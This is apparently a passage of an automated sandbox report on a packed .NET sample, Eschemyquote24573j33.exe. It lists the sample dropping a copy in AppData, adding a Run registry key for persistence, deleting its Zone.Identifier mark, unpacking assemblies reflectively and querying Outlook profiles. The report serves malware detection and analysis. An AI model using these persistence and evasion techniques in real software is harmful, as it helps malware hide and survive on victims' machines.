                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Eschemyquote24573j33.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Eschemyquote24573j33.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Eschemyquote24573j33.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: BXgJ.pdb source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr
                    Source: Binary string: BXgJ.pdbSHA256+ source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Eschemyquote24573j33.exe, MainForm.cs.Net Code: InitializeComponent
                    Source: 0.2.Eschemyquote24573j33.exe.293d9d8.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.5490000.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.cs.Net Code: EAPqyhE53x System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.294a200.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.cs.Net Code: EAPqyhE53x System.Reflection.Assembly.Load(byte[])
                    Source: Eschemyquote24573j33.exeStatic PE information: 0xDA4BC7FC [Sun Jan 20 21:11:24 2086 UTC]
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_04DD1760 pushfd ; iretd 0_2_04DD176E
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_04DDDDB0 push eax; mov dword ptr [esp], ecx0_2_04DDDDC4
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F83F81 push E406F3A8h; retf 0_2_06F83F8D
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeCode function: 0_2_06F81408 push es; iretd 0_2_06F81414
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_0526DDB0 push eax; mov dword ptr [esp], ecx7_2_0526DDC4
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 7_2_07083F81 push E40703A8h; retf 7_2_07083F8D
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07A53F81 push E40747A8h; retf 10_2_07A53F8D
                    Source: Eschemyquote24573j33.exeStatic PE information: section name: .text entropy: 7.8248096934652995
                    Source: 0.2.Eschemyquote24573j33.exe.293d9d8.1.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.Eschemyquote24573j33.exe.293d9d8.1.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.Eschemyquote24573j33.exe.5490000.5.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.Eschemyquote24573j33.exe.5490000.5.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, UlyEHKDV3LaCLLom7F.csHigh entropy of concatenated method names: 'pH1nT0iaOY', 'FQNnEB4jwZ', 'hMWnUogfXy', 'QLYUxgPJ8s', 'oF7Uz4tlBf', 'K19nKoUx7B', 'A5tnNZEGNZ', 'PDNnZa4gaA', 'AC4nu0RQSL', 'nQhnqmZFJZ'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, hIgUhVm92GZDPRtBZs.csHigh entropy of concatenated method names: 'aEerNH6Pee', 'e1Crux6uG0', 'T7rrqU0eyk', 's7HrTZ4tfw', 'mCDrJsHC5n', 'oL5rBfBvT2', 'DDnrU9fksV', 'YkD8Vr7oxG', 'uLP8AV5rwc', 'afE8iWwyid'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, tnUsWDzA62wbjJK7EM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQUr2Tcm5c', 'a9Zre2D0PL', 'Ue7rbCnods', 'pgwr5oOjgu', 'x4Rr8D34RW', 'lA6rrDWMI5', 'EXprOhZX7I'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, VWsQCrlF0Gyb1uODge.csHigh entropy of concatenated method names: 'eDv8TU0X3D', 'NDL8JxENm7', 'Q5X8EvdfPD', 'T0s8BeLCP7', 'yn48UXqALy', 'q578n3f8YE', 'msO83F7Vj0', 'tTb8GM1mb9', 's4y8tMaySv', 'Mub80LT52g'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, Kr6tTfhpAfgPwUsiHt.csHigh entropy of concatenated method names: 'Dispose', 'oOrNiYOKbf', 'w8MZm4XS2y', 'SrxDD81xHF', 's86NxNKYLD', 'QJLNzjicse', 'ProcessDialogKey', 'E9lZKtXedb', 'CWGZNT5rxG', 'CQwZZelvbL'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, xGr7Z2GEn7B188JC2j.csHigh entropy of concatenated method names: 'qii5AAueNq', 'fyX5xHhgZc', 'gI88Kh75ro', 'obf8N2wUcD', 'Djh59XZles', 'tmg5c3xJun', 'a7p5gweeln', 'TOX54Pe9Rk', 'aAF5H2EGrx', 'p2q5L91nxg'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, VY8MeekEpUrCIR70BG.csHigh entropy of concatenated method names: 'dTkEko97C5', 'YjOEFhMteY', 'nuDEjSZtYX', 'vmoERBXiTG', 'OnMEe9baGO', 'wDCEbEucwY', 'oDwE59Wkda', 'rQIE8lH3JX', 'voQErBa3bM', 'iEoEOMMKqC'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, HABTMne0v4CLRfMopA9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C8rO44BB6u', 'hNyOHjeFHF', 'QxBOLoQMGh', 'fwbOvdv3f2', 'E47OQAiiwx', 'iYsOap421y', 'lXKOVFcXrV'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, PrUsrswPYsf1O0VuSQ.csHigh entropy of concatenated method names: 'H4AJ4j3ilH', 'wsyJH4d698', 'MJaJLoZ7oY', 'RUlJvFRcV4', 'a5LJQ2g69H', 'FYtJad7KGm', 'X6AJVn4jSw', 'owoJAltLbl', 'GAVJitwjyS', 'hXXJx4GMn2'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, Y4AIJCVq0AJhyrGakh.csHigh entropy of concatenated method names: 'WSe8SZ3YF4', 'pti8mWX9em', 'vmZ8oqtDPE', 'hkb8WUToAC', 'A7f84TLLCY', 'xxe8ItRbog', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, xeO7gIW6JJoYZalNAu.csHigh entropy of concatenated method names: 'SHqnX5xpDD', 'yrqn6UQZpy', 'n99nyv3JvF', 'Tcknk910Ni', 'O23nl1DQiq', 'jvcnFbBPgv', 'TEFnCUUSFt', 'yFsnjrQFDE', 'Qb4nRV0JWX', 'QuRnMayd87'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, EeXc16K8feKegOUF9O.csHigh entropy of concatenated method names: 'zDwuy78Yq0GHpy02baO', 'NmcrW48t4xKZ5ETtqDB', 'BUkU83I4oM', 'v6iUrbcFMe', 'vd1UO1sF6l', 'tHtWgg85kIrTrMFsJv8', 'ycINcn8bJuHIaQB7d7P', 'tu0PNV8gRkNd9YOnaqE'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, vwPnnh1JETgPmNWxFh.csHigh entropy of concatenated method names: 'kH4ePI6d2w', 'ay0ec9sgde', 'SNee47thXv', 'AFIeHMbpLT', 'MIGemZPTPT', 'HbaeomHW6J', 'JiheWL44nK', 'sMIeIQeG1N', 'NGNeYJvkHT', 'EonepykAOn'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, QsbL7G6byXSclr7ntR.csHigh entropy of concatenated method names: 'QfYULBZAOE', 'JSeUv4Q8OK', 'RO9UQXHnKs', 'ToString', 'XkeUad4Yfw', 'ww3UVnAuxM', 'Jlry9P8avPvmYsH7kUq', 'dy0Uir8T4B5SaJE8191', 'r6TWWP8JqsdkxTFhbjw'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, eFbwqseeQJnslq7RDgX.csHigh entropy of concatenated method names: 'ToString', 'w0XOuNICc3', 'vaYOqyDgBe', 'uGsO76rLOm', 'FbWOTpEQsy', 'pwnOJg8t70', 'HPTOEMocDL', 'Ls6OBaQNJ6', 'rFuI4lPxwIXkR6VXplG', 'dBSTwmPzi37Np5amv94'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, CqTErPPhFYaD5LQ6TP.csHigh entropy of concatenated method names: 'Jow5tRMrIr', 'Vtv50UEnKd', 'ToString', 'Gdc5T8eOtd', 'wmD5JYZ9Mb', 'Tmc5ELEpAl', 'kP85BUIDcQ', 'mRM5U9C0JV', 'DLQ5n7X5PC', 'McY53TyA3C'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, j21in5yVGLEM0360j8.csHigh entropy of concatenated method names: 'YRDy0WrpK', 'OFKkwQgS6', 'D1WFyGTfI', 'uyhCYjXJd', 'pefRGc0xX', 'R1KMFsmYJ', 'B8fO809gmGgQfT5aPE', 'zoA9UYo7AbkpggaFK3', 'Kgk80KIK7', 'udbOphJqA'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, avfUgueg8O5E6WTR2iN.csHigh entropy of concatenated method names: 'BpBrXXR2M4', 'RhRr6TWPjl', 'DHNryoIfBm', 'pfMrk24MPn', 'qpLrlQWCEY', 'Po3rFs8tOC', 'r3drClycdm', 'AWSrj2L4Uc', 'YbcrR9igfL', 'eHurMZK3BD'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, rU56x3nqyE643hqfjy.csHigh entropy of concatenated method names: 'c1tNnpXhbH', 'BY7N3v2ENh', 'zbXNtVusxl', 'QkFN0obkx7', 'OJtNeykL8l', 'JEoNbGhgmY', 'dEYJCHOKfVpcG0Jrj0', 'NQMJjLCg17Zx2MEfFZ', 'JuONNYxWhK', 'kqrNuqy96l'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, gCdcqLt9S80SxXohl8.csHigh entropy of concatenated method names: 'AgRu7nhUWk', 'wRjuT4t5cw', 'dA4uJgP0jn', 'PvBuEF6J5y', 'hMUuBJREL1', 'TC8uUdeWId', 'xuMunQ3nuC', 'fnVu3lbXy4', 'JFAuGsjecx', 'eZuutf5CAm'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, xjvwbyYXDQ5yAjhT6V.csHigh entropy of concatenated method names: 'V0lU7xy1FK', 'cCZUJHX0UM', 'QSVUBheX0a', 'QPvUn9643w', 'GVXU3NTAQQ', 'FpPBQDOw1G', 'wwhBamCGe5', 'CTFBVubfLs', 't3EBAr5mM0', 'qKQBiHwCXB'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, BTh9fEIFxhSR4C1soA.csHigh entropy of concatenated method names: 'SmBBlEdGPT', 'G7eBCM0fR8', 'BCVEoGaeYq', 'aTHEWbCyi6', 'dtoEIb9ClA', 'YIdEY4VDHh', 'GsBEpDQwWN', 'HKZEfgfWTE', 'CKuE1flDgy', 'J2SEPZcBMJ'
                    Source: 0.2.Eschemyquote24573j33.exe.7280000.6.raw.unpack, w58GgSNlKHJbjw5uF2.csHigh entropy of concatenated method names: 'hQH2jBR4nH', 'WvX2RysMVl', 'nP82SQiyvk', 'VkW2mHNm9Z', 'rG62Wo6ihd', 'GIv2IlFp7p', 'K0A2peOJ1x', 'naR2fToKUU', 'xL12Pu8ELL', 'QwX29cMNHU'
                    Source: 0.2.Eschemyquote24573j33.exe.294a200.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.Eschemyquote24573j33.exe.294a200.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, UlyEHKDV3LaCLLom7F.csHigh entropy of concatenated method names: 'pH1nT0iaOY', 'FQNnEB4jwZ', 'hMWnUogfXy', 'QLYUxgPJ8s', 'oF7Uz4tlBf', 'K19nKoUx7B', 'A5tnNZEGNZ', 'PDNnZa4gaA', 'AC4nu0RQSL', 'nQhnqmZFJZ'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, hIgUhVm92GZDPRtBZs.csHigh entropy of concatenated method names: 'aEerNH6Pee', 'e1Crux6uG0', 'T7rrqU0eyk', 's7HrTZ4tfw', 'mCDrJsHC5n', 'oL5rBfBvT2', 'DDnrU9fksV', 'YkD8Vr7oxG', 'uLP8AV5rwc', 'afE8iWwyid'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, tnUsWDzA62wbjJK7EM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQUr2Tcm5c', 'a9Zre2D0PL', 'Ue7rbCnods', 'pgwr5oOjgu', 'x4Rr8D34RW', 'lA6rrDWMI5', 'EXprOhZX7I'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, VWsQCrlF0Gyb1uODge.csHigh entropy of concatenated method names: 'eDv8TU0X3D', 'NDL8JxENm7', 'Q5X8EvdfPD', 'T0s8BeLCP7', 'yn48UXqALy', 'q578n3f8YE', 'msO83F7Vj0', 'tTb8GM1mb9', 's4y8tMaySv', 'Mub80LT52g'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, Kr6tTfhpAfgPwUsiHt.csHigh entropy of concatenated method names: 'Dispose', 'oOrNiYOKbf', 'w8MZm4XS2y', 'SrxDD81xHF', 's86NxNKYLD', 'QJLNzjicse', 'ProcessDialogKey', 'E9lZKtXedb', 'CWGZNT5rxG', 'CQwZZelvbL'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, xGr7Z2GEn7B188JC2j.csHigh entropy of concatenated method names: 'qii5AAueNq', 'fyX5xHhgZc', 'gI88Kh75ro', 'obf8N2wUcD', 'Djh59XZles', 'tmg5c3xJun', 'a7p5gweeln', 'TOX54Pe9Rk', 'aAF5H2EGrx', 'p2q5L91nxg'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, VY8MeekEpUrCIR70BG.csHigh entropy of concatenated method names: 'dTkEko97C5', 'YjOEFhMteY', 'nuDEjSZtYX', 'vmoERBXiTG', 'OnMEe9baGO', 'wDCEbEucwY', 'oDwE59Wkda', 'rQIE8lH3JX', 'voQErBa3bM', 'iEoEOMMKqC'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, HABTMne0v4CLRfMopA9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C8rO44BB6u', 'hNyOHjeFHF', 'QxBOLoQMGh', 'fwbOvdv3f2', 'E47OQAiiwx', 'iYsOap421y', 'lXKOVFcXrV'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, PrUsrswPYsf1O0VuSQ.csHigh entropy of concatenated method names: 'H4AJ4j3ilH', 'wsyJH4d698', 'MJaJLoZ7oY', 'RUlJvFRcV4', 'a5LJQ2g69H', 'FYtJad7KGm', 'X6AJVn4jSw', 'owoJAltLbl', 'GAVJitwjyS', 'hXXJx4GMn2'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, Y4AIJCVq0AJhyrGakh.csHigh entropy of concatenated method names: 'WSe8SZ3YF4', 'pti8mWX9em', 'vmZ8oqtDPE', 'hkb8WUToAC', 'A7f84TLLCY', 'xxe8ItRbog', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, xeO7gIW6JJoYZalNAu.csHigh entropy of concatenated method names: 'SHqnX5xpDD', 'yrqn6UQZpy', 'n99nyv3JvF', 'Tcknk910Ni', 'O23nl1DQiq', 'jvcnFbBPgv', 'TEFnCUUSFt', 'yFsnjrQFDE', 'Qb4nRV0JWX', 'QuRnMayd87'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, EeXc16K8feKegOUF9O.csHigh entropy of concatenated method names: 'zDwuy78Yq0GHpy02baO', 'NmcrW48t4xKZ5ETtqDB', 'BUkU83I4oM', 'v6iUrbcFMe', 'vd1UO1sF6l', 'tHtWgg85kIrTrMFsJv8', 'ycINcn8bJuHIaQB7d7P', 'tu0PNV8gRkNd9YOnaqE'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, vwPnnh1JETgPmNWxFh.csHigh entropy of concatenated method names: 'kH4ePI6d2w', 'ay0ec9sgde', 'SNee47thXv', 'AFIeHMbpLT', 'MIGemZPTPT', 'HbaeomHW6J', 'JiheWL44nK', 'sMIeIQeG1N', 'NGNeYJvkHT', 'EonepykAOn'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, QsbL7G6byXSclr7ntR.csHigh entropy of concatenated method names: 'QfYULBZAOE', 'JSeUv4Q8OK', 'RO9UQXHnKs', 'ToString', 'XkeUad4Yfw', 'ww3UVnAuxM', 'Jlry9P8avPvmYsH7kUq', 'dy0Uir8T4B5SaJE8191', 'r6TWWP8JqsdkxTFhbjw'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, eFbwqseeQJnslq7RDgX.csHigh entropy of concatenated method names: 'ToString', 'w0XOuNICc3', 'vaYOqyDgBe', 'uGsO76rLOm', 'FbWOTpEQsy', 'pwnOJg8t70', 'HPTOEMocDL', 'Ls6OBaQNJ6', 'rFuI4lPxwIXkR6VXplG', 'dBSTwmPzi37Np5amv94'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, CqTErPPhFYaD5LQ6TP.csHigh entropy of concatenated method names: 'Jow5tRMrIr', 'Vtv50UEnKd', 'ToString', 'Gdc5T8eOtd', 'wmD5JYZ9Mb', 'Tmc5ELEpAl', 'kP85BUIDcQ', 'mRM5U9C0JV', 'DLQ5n7X5PC', 'McY53TyA3C'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, j21in5yVGLEM0360j8.csHigh entropy of concatenated method names: 'YRDy0WrpK', 'OFKkwQgS6', 'D1WFyGTfI', 'uyhCYjXJd', 'pefRGc0xX', 'R1KMFsmYJ', 'B8fO809gmGgQfT5aPE', 'zoA9UYo7AbkpggaFK3', 'Kgk80KIK7', 'udbOphJqA'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, avfUgueg8O5E6WTR2iN.csHigh entropy of concatenated method names: 'BpBrXXR2M4', 'RhRr6TWPjl', 'DHNryoIfBm', 'pfMrk24MPn', 'qpLrlQWCEY', 'Po3rFs8tOC', 'r3drClycdm', 'AWSrj2L4Uc', 'YbcrR9igfL', 'eHurMZK3BD'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, rU56x3nqyE643hqfjy.csHigh entropy of concatenated method names: 'c1tNnpXhbH', 'BY7N3v2ENh', 'zbXNtVusxl', 'QkFN0obkx7', 'OJtNeykL8l', 'JEoNbGhgmY', 'dEYJCHOKfVpcG0Jrj0', 'NQMJjLCg17Zx2MEfFZ', 'JuONNYxWhK', 'kqrNuqy96l'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, gCdcqLt9S80SxXohl8.csHigh entropy of concatenated method names: 'AgRu7nhUWk', 'wRjuT4t5cw', 'dA4uJgP0jn', 'PvBuEF6J5y', 'hMUuBJREL1', 'TC8uUdeWId', 'xuMunQ3nuC', 'fnVu3lbXy4', 'JFAuGsjecx', 'eZuutf5CAm'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, xjvwbyYXDQ5yAjhT6V.csHigh entropy of concatenated method names: 'V0lU7xy1FK', 'cCZUJHX0UM', 'QSVUBheX0a', 'QPvUn9643w', 'GVXU3NTAQQ', 'FpPBQDOw1G', 'wwhBamCGe5', 'CTFBVubfLs', 't3EBAr5mM0', 'qKQBiHwCXB'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, BTh9fEIFxhSR4C1soA.csHigh entropy of concatenated method names: 'SmBBlEdGPT', 'G7eBCM0fR8', 'BCVEoGaeYq', 'aTHEWbCyi6', 'dtoEIb9ClA', 'YIdEY4VDHh', 'GsBEpDQwWN', 'HKZEfgfWTE', 'CKuE1flDgy', 'J2SEPZcBMJ'
                    Source: 0.2.Eschemyquote24573j33.exe.3b8df60.2.raw.unpack, w58GgSNlKHJbjw5uF2.csHigh entropy of concatenated method names: 'hQH2jBR4nH', 'WvX2RysMVl', 'nP82SQiyvk', 'VkW2mHNm9Z', 'rG62Wo6ihd', 'GIv2IlFp7p', 'K0A2peOJ1x', 'naR2fToKUU', 'xL12Pu8ELL', 'QwX29cMNHU'
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctsdvwTJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeFile opened: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
